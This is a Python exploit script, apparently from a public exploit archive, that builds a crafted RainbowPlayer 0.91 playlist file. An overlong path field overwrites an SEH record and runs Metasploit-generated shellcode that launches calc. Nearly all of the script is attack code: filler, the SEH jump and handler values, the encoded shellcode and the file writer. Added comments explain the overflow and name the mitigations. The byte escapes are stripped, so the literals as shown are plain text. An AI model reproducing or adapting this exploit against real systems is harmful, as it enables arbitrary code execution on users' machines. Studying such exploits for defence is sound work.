
# Title : RainbowPlayer 0.91 (playlist) Universal SEH Overwrite Exploit
# Published : 2009-03-10
# Author : His0k4


#usage: exploit.py
#Software download: http://www.nanocodesoft.com/products/rainbowplayer/rp091.exe
#
# Startup banner: tool name, author, tested platform and greetings, one tuple
# entry per printed line. Each string is emitted exactly as listed, including
# the trailing "n" that some of them carry.
banner_lines = (
    "**************************************************************************",
    " RainbowPlayer 0.91 (playlist) Universal Seh Overwrite Exploitn",
    " Author : His0k4",
    " Tested on: Windows XP Pro SP2 Frn",
    " Greetings to:",
    " All friends & muslims HaCkers(dz)n",
    "**************************************************************************",
)
for banner_line in banner_lines:
    print(banner_line)
         	
			
# Assembles the text of one crafted RainbowPlayer playlist (.rpl) entry whose
# quoted path field is far longer than a normal file path. Per the page title,
# the overlong field overruns a buffer in RainbowPlayer 0.91 and overwrites a
# structured exception handler (SEH) record.
#
# NOTE(review): every literal below is written without backslashes ("x41", not
# "\x41"), so as listed each one is plain ASCII text rather than raw bytes; the
# escapes look to have been lost when the page was extracted.
#
# Defender view: the observable indicator is a playlist entry whose path runs
# to many hundreds of bytes. The root cause is presumably a missing length
# check on that field when the playlist is parsed; SafeSEH/SEHOP and DEP are
# the platform mitigations aimed at this class of handler overwrite.

# Filler: the same literal repeated 605 times, placed between the opening of
# the path and the two SEH fields (see the concatenation at the end).
buff = "x41" * 605

# The two fields of an SEH record, as the names suggest: the pointer to the
# next record, then the handler address. The module the handler value points
# into is not identified on this page.
next_seh = "xEBx06x41x41"

seh = "x08x2Ax01x10"


# Playlist framing. Read as hex bytes, header1 spells `"exploit.mp3" 0`, a
# newline, then `"C:\` -- the opening of a quoted path that is left unclosed --
# and header2 spells `.mp3"`, which closes it after the oversized content.
header1= "x22x65x78x70x6Cx6Fx69x74x2Ex6Dx70x33x22x20x30x0Ax22x43x3Ax5C"
header2= "x2Ex6Dx70x33x22"

# win32_exec -  EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
# Per the generator header above, this is a proof-of-concept payload that
# starts the Windows calculator (CMD=calc), 330 bytes, Alpha2-encoded.
shellcode = (
	"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
	"x49x49x49x49x49x49x49x49x49x49x48x49x51x5ax6ax67"
	"x58x50x30x42x30x42x6bx42x41x77x41x42x32x42x41x32"
	"x41x41x30x41x41x58x38x42x42x50x75x6bx59x79x6cx6b"
	"x58x37x34x53x30x35x50x53x30x6cx4bx41x55x47x4cx6c"
	"x4bx51x6cx63x35x54x38x77x71x7ax4fx6ex6bx70x4fx74"
	"x58x4ex6bx43x6fx37x50x43x31x5ax4bx47x39x4ex6bx37"
	"x44x6cx4bx45x51x58x6ex37x41x6bx70x6cx59x6cx6cx4f"
	"x74x6fx30x62x54x47x77x6bx71x59x5ax76x6dx74x41x6b"
	"x72x58x6bx69x64x65x6bx41x44x47x54x34x44x44x35x38"
	"x65x6ex6bx33x6fx31x34x37x71x6ax4bx51x76x6ex6bx44"
	"x4cx42x6bx6ex6bx43x6fx57x6cx55x51x6ax4bx4cx4bx47"
	"x6cx4ex6bx75x51x4ax4bx4ex69x31x4cx66x44x37x74x4f"
	"x33x55x61x4fx30x30x64x6ex6bx77x30x36x50x4ex65x39"
	"x50x31x68x64x4cx6cx4bx73x70x36x6cx6ex6bx30x70x37"
	"x6cx6cx6dx4ex6bx45x38x45x58x58x6bx73x39x6ex6bx4b"
	"x30x4ex50x75x50x73x30x63x30x6cx4bx45x38x65x6cx31"
	"x4fx30x31x4cx36x75x30x32x76x6dx59x59x68x6cx43x4b"
	"x70x41x6bx46x30x45x38x48x70x4ex6ax65x54x43x6fx71"
	"x78x4fx68x59x6ex4cx4ax76x6ex52x77x6bx4fx6bx57x72"
	"x43x53x51x30x6cx52x43x77x70x67"
    )

	
# Final layout of the entry: opening of the quoted path, filler, the two SEH
# fields, the payload, then the closing `.mp3"`.
exploit = header1 + buff + next_seh + seh + shellcode + header2

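# Write the assembled playlist text to rainbow.rpl in the current directory.
# The context manager closes the handle even when write() fails, and only I/O
# failures are reported as "Error"; any other exception now surfaces instead
# of being hidden by a bare except.
try:
    with open("rainbow.rpl", 'w') as out_file:
        out_file.write(exploit)
except IOError:
    print("Error")
else:
    # Reached only when the file was opened, written and closed cleanly.
    print("Exploit file created!n")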
